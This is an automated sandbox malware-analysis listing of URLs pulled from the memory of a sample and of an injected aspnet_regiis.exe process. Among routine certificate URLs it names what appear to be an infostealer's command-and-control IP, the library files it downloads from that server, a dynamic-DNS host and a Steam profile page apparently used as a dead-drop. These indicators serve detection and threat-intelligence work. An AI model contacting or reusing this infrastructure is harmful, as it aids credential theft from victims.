Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: file.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, file.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: file.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: aspnet_regiis.exe, 00000003.00000002.2662565963.0000000021DBD000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr String found in binary or memory: https://49.12.197.9
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835858623.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835626420.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835747383.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/0
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/12.197.9/
Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/5
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/HIIJJJKEGI
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/I
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/W
Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/c
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/g
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/mozglue.dll(
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/mozglue.dllL
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: aspnet_regiis.exe, 00000003.00000003.1972492301.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/nss3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/nss3.dll#
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/softokn3.dllB
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://49.12.197.9/vcruntime140.dllq
